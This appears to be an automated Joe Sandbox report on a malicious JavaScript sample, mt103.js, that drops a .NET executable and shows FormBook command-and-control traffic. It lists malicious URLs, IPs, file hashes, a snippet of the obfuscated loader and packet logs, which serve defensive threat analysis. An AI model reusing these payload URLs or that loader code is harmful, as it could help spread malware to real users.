                                                    Analysis ID:794331
                                                    Start date and time:2023-01-30 13:37:38 +01:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 13m 56s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:14
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • GSI enabled (Javascript)
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample file name:mt103.js
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winJS@9/4@21/15
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:
                                                    • Successful, ratio: 69.6% (good quality ratio 62.2%)
                                                    • Quality average: 69.2%
                                                    • Quality standard deviation: 33.1%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 108
                                                    • Number of non-executed functions: 83
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .js
                                                    • Override analysis time to 240s for JS/VBS files not yet terminated

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    13:39:24API Interceptor1x Sleep call for process: HBhG.exe modified
                                                    13:40:00API Interceptor1309x Sleep call for process: explorer.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    162.241.2.66New_PO#98202139.xllGet hashmaliciousBrowse
                                                    • www.esportesht.com.br/ovc/sxx.exe
                                                    New_Order.xllGet hashmaliciousBrowse
                                                    • www.esportesht.com.br/ovc/ew.exe
                                                    PO36782110.xllGet hashmaliciousBrowse
                                                    • www.esportesht.com.br/ovc/so.exe
                                                    Product_Inquiry.xllGet hashmaliciousBrowse
                                                    • www.esportesht.com.br/ovc/wir.exe
                                                    46.28.105.2SKMB20221912.docGet hashmaliciousBrowse
                                                    • www.nicneni.xyz/8rmt/?z2J=2dKDjzuXs&db=95liNvBcnDJEWJyfenB67iDKAsFSNoqRIYPN32pJJ8+5Rkrd/63DdZ1l9z8TTNvSKs/w3w==
                                                    QUOTATION.xlsxGet hashmaliciousBrowse
                                                    • www.goodgameboosters.com/pl8/?TDH=gJDAgyI8Qh9YgCrJGLgtS3HAt+dR0gLt3uaHqVKFpA6volC9/8fu29ej80XqzmW/US8I7Q==&NN=YJBl4z
                                                    cmr and invoice.exeGet hashmaliciousBrowse
                                                    • www.crifinmarket.com/kgw/?nPFXf4=tFNZ/BpFiMLKl+p+PMdnqMaAeB5MR50bR01dg9sRY1BLF93FNJahaUEmtiwmhyAlBMev&_TAHEx=YN9pbjQPQbS
                                                    00127.exeGet hashmaliciousBrowse
                                                    • www.photozanzibar.com/p980/?h0DlJTn=cac2b6sn54OM9hG2Sxws8dbyDtpG1JjAw5vVttri90Up9fBVHs6G7t5w34l5jScw3AoQ&MX1Xp=XbmxNzNpsPS0Gpdp

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    www.sandpiper-apts.comfile.exeGet hashmaliciousBrowse
                                                    • 164.88.201.214
                                                    hirosguide.huPAYMENTN.EXE.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    PaymentNotification.pdf.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    INVOICE 1284 - DO 1494 - PO073400-1.jsGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    bank details.jsGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    www.teammart.onlinefile.exeGet hashmaliciousBrowse
                                                    • 184.94.215.91

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    OIS1UShttps://elink.io/p/approvedmessage-960a5e1Get hashmaliciousBrowse
                                                    • 162.241.70.188
                                                    https://pages.qwilr.com/Scanned-Document-for-Review-Ol5ot6onTnWrGet hashmaliciousBrowse
                                                    • 162.241.70.188
                                                    v.vbsGet hashmaliciousBrowse
                                                    • 162.241.2.92
                                                    changefeov.exeGet hashmaliciousBrowse
                                                    • 162.241.203.136
                                                    changefeov.exeGet hashmaliciousBrowse
                                                    • 162.241.203.136
                                                    ZnI6vV1ROi.exeGet hashmaliciousBrowse
                                                    • 162.241.203.136
                                                    L2PndbStbm.exeGet hashmaliciousBrowse
                                                    • 162.241.2.233
                                                    X378ty9Y3k.exeGet hashmaliciousBrowse
                                                    • 162.241.2.233
                                                    1dxx5YviuO.exeGet hashmaliciousBrowse
                                                    • 162.241.2.233
                                                    438bTWucNC.exeGet hashmaliciousBrowse
                                                    • 162.241.2.233
                                                    2B4FbdDSQ0.exeGet hashmaliciousBrowse
                                                    • 162.241.2.233
                                                    setup.exeGet hashmaliciousBrowse
                                                    • 162.241.203.136
                                                    BANK SLIP.exeGet hashmaliciousBrowse
                                                    • 162.241.3.29
                                                    Z43tniEVyF.exeGet hashmaliciousBrowse
                                                    • 162.241.2.197
                                                    DHL Original BL, PL, CI Copies.htm.exeGet hashmaliciousBrowse
                                                    • 162.241.203.45
                                                    VirtualBox-7.0.2-154219-Win.exeGet hashmaliciousBrowse
                                                    • 162.241.203.136
                                                    VirtualBox-7.0.2-154219-Win.exeGet hashmaliciousBrowse
                                                    • 162.241.203.136
                                                    Updated_Service_Policy.exeGet hashmaliciousBrowse
                                                    • 162.241.203.45
                                                    Telex_Copy.exeGet hashmaliciousBrowse
                                                    • 162.241.2.192
                                                    http://www.nntyholdings.co.zaGet hashmaliciousBrowse
                                                    • 192.185.147.102

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    37f463bf4616ecd445d4a1937da06e19https://1drv.ms/w/s!Ak7psWnXktOUbpS5SvTskZcJZMEGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    https://qha4c.app.link/xtg1RqDrPwbGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    https://1drv.ms/w/s!Au8rnhmq1l5ZfHjnhpQ700s_UP0Get hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    https://explore-foliosociety.com/4EQH-1H9GJ-7WM5TM-1AWIZQ-1/c.aspxGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    Fct63d79.msiGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    Requested PO ___ .htmGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    SC_TR11670000.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    scan_2023748984785874774.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    BookingDetails77#6276.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    cargo_manifest_3432-67383-733.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    #Ud83d#Udd0aAudio-Mesage Transcription.HtML.htmLGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    https://www.google.com/url?q=https://script.google.com/macros/s/AKfycbzM_yOymOPYchWgWLzEuacoAGupl5BjLFzJz3f2tw-iRoxvi2cxifVfC3q4axRhdPM3/exec?q5erdwyd&sa=D&source=docs&ust=1674899009939775&usg=AOvVaw0g89hrD8M7bB_E-BkBqs_ZGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    RlqmqtGmmo.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    rzIzm68n2l.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    sdkfgnasfnjdg.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    https://arbikinis.com.mx/wp-includes/images/redi.phpGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    file.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    Voice Call Transmitter.htmlGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    https://karl-jaspers-gesellschaft.de/Get hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    4567876tyu.htmlGet hashmaliciousBrowse
                                                    • 91.227.138.48

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HBhG.exe.log

                                                    Download File
                                                    Process:C:\Users\user\AppData\Local\Temp\HBhG.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):226
                                                    Entropy (8bit):5.3467126928258955
                                                    Encrypted:false
                                                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                    MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                    SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                    SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                    SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\HBhG[1].exe

                                                    Download File
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):615936
                                                    Entropy (8bit):7.947521655611989
                                                    Encrypted:false
                                                    SSDEEP:12288:OCF4GQWsWKKlWr2LD1WpN8Vm62Mum/sxMjp2ilM:Oi4GQWs0LpW0m62IsaJW
                                                    MD5:02DF8C86345D056735FA60116B93ED2B
                                                    SHA1:70294E9E09C8D9D895599B73D1091C4013AEE691
                                                    SHA-256:C7627ADC0797D3315C2C942356C8CB1FCA39AFBD0335512236BE79A6E2F7ACB3
                                                    SHA-512:02A16FFDA407D61663E2CBC8FE2D4699528AA439E5899B773484C197A823D414DA197B0A6E4AA18FF962E12E7268BDD358399D58502700E262CBB7201EE549A6
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 55%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................X..........nw... ........@.. ....................................`................................. w..K....................................v............................................... ............... ..H............text...tW... ...X.................. ..`.sdata...............\..............@....rsrc................^..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\30q5648k6

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\control.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):94208
                                                    Entropy (8bit):1.2891393435168748
                                                    Encrypted:false
                                                    SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                    MD5:037D23498B81732EEAAAD0E8015F3F85
                                                    SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                    SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                    SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\HBhG.exe

                                                    Download File
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):615936
                                                    Entropy (8bit):7.947521655611989
                                                    Encrypted:false
                                                    SSDEEP:12288:OCF4GQWsWKKlWr2LD1WpN8Vm62Mum/sxMjp2ilM:Oi4GQWs0LpW0m62IsaJW
                                                    MD5:02DF8C86345D056735FA60116B93ED2B
                                                    SHA1:70294E9E09C8D9D895599B73D1091C4013AEE691
                                                    SHA-256:C7627ADC0797D3315C2C942356C8CB1FCA39AFBD0335512236BE79A6E2F7ACB3
                                                    SHA-512:02A16FFDA407D61663E2CBC8FE2D4699528AA439E5899B773484C197A823D414DA197B0A6E4AA18FF962E12E7268BDD358399D58502700E262CBB7201EE549A6
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 55%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................X..........nw... ........@.. ....................................`................................. w..K....................................v............................................... ............... ..H............text...tW... ...X.................. ..`.sdata...............\..............@....rsrc................^..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:ASCII text, with very long lines (9408), with no line terminators
                                                    Entropy (8bit):5.501067259387244
                                                    TrID:
                                                    • Java Script (8504/1) 100.00%
                                                    File name:mt103.js
                                                    File size:9408
                                                    MD5:aef9d0a0d6eb0f1acc61c9fef31df227
                                                    SHA1:8ab951947dfa34a70ed7aeea10b7662b481049f0
                                                    SHA256:4bfa87d48d207b7b0a04112356e6bebe73ebc8f817bb0f940ef0b1aa5f2a2c4d
                                                    SHA512:38b11a55705c746aa35b53e2bd53529d5f36c5b02516249cbb35c36be08cd8d066f784348fb7843cf2355b3316db088afd6b9037a15a430994a8f8df09f0f86d
                                                    SSDEEP:192:R8eKzt6KEbkQUGeTvkCypW3MsgmW6kIGwKda0wtT3SLN5etUh/bMJ+wQKx4fyNa3:xKZnPKGvr30zo0WoXT9KyqakZl+q5q0Y
                                                    TLSH:84122F092AD065C803C70BB33B2BF5E6E9AD9ABF3955885F9101BC91BE10E25DAD5630
                                                    File Content Preview:var _0x296948=_0x4692,_0x25c5ce=_0x4251;(function(_0x1fd6ec,_0x1eb0be){var _0x496a96=_0x4692,_0x399b45=_0x4251,_0x2663fc=_0x1fd6ec();while(!![]){try{var _0x434d37=-parseInt(_0x399b45(0x19e))/0x1+-parseInt(_0x399b45(0x1af))/0x2+parseInt(_0x399b45(0x188))/0

                                                    File Icon

                                                    Icon Hash:e8d69ece968a9ec4

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    192.168.2.6184.94.215.9149731802031412 01/30/23-13:40:47.278994TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.6184.94.215.91
                                                    192.168.2.6184.94.215.9149731802031449 01/30/23-13:40:47.278994TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.6184.94.215.91
                                                    192.168.2.6184.94.215.9149731802031453 01/30/23-13:40:47.278994TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.6184.94.215.91

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 30, 2023 13:39:21.764972925 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:21.765034914 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:21.765158892 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:21.773595095 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:21.773643017 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:21.865179062 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:21.865413904 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.144123077 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.144170046 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.145133018 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.145209074 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.198496103 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.198529005 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.237085104 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.237129927 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.237191916 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.237221003 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.237241983 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.237266064 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.270797968 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.270977974 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.273556948 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.273694992 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.273724079 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.273809910 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.308701992 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.308784008 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.308971882 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.308998108 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.309058905 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.309066057 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.309078932 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.309123993 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.309129953 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.309211969 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.346312046 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.346415043 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.346467018 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.346488953 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.346517086 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.346525908 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.346554041 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.346560955 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.346586943 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.346599102 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.346621037 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.346626997 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.346661091 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.346676111 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.346718073 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.346743107 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.346755028 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.346798897 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.346839905 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.346904039 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.346915960 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.346932888 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.346968889 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.346997023 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.347001076 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.347018003 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.347079992 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.347084999 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.347100019 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.347150087 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.347160101 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.347173929 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.347232103 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.347254992 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.347264051 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.347290993 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.347318888 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.380508900 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.380726099 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.380974054 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.381129026 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.381187916 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.381479025 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.381561995 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.386374950 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.386374950 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.386374950 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.386374950 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.386374950 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.386374950 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.386374950 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.386409998 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.386454105 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.386709929 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.386733055 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.386770964 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.386843920 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.386914015 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.386930943 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.387118101 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.412533045 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.412686110 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.412710905 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.412733078 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.412786961 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.412826061 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.412892103 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.412915945 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.412976027 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.412977934 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.412995100 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.413033962 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.413609028 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.413714886 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.413861990 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.413978100 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.415128946 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.415235043 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.415261030 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.415282965 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.415308952 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.415326118 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.415340900 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.415405035 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.415409088 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.415431976 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.415472984 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.415702105 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.415781021 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.415808916 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.415827990 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.415853977 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.415873051 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.415977955 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416058064 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.416058064 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416074991 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416114092 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.416222095 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416292906 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.416373014 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416454077 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416469097 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.416488886 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416518927 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416520119 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.416551113 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.416559935 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416598082 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.416632891 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.420929909 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.421087027 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.446969986 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.447057962 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.447197914 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.447223902 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.447273970 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.447513103 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.447621107 CET49714443192.168.2.691.227.138.48
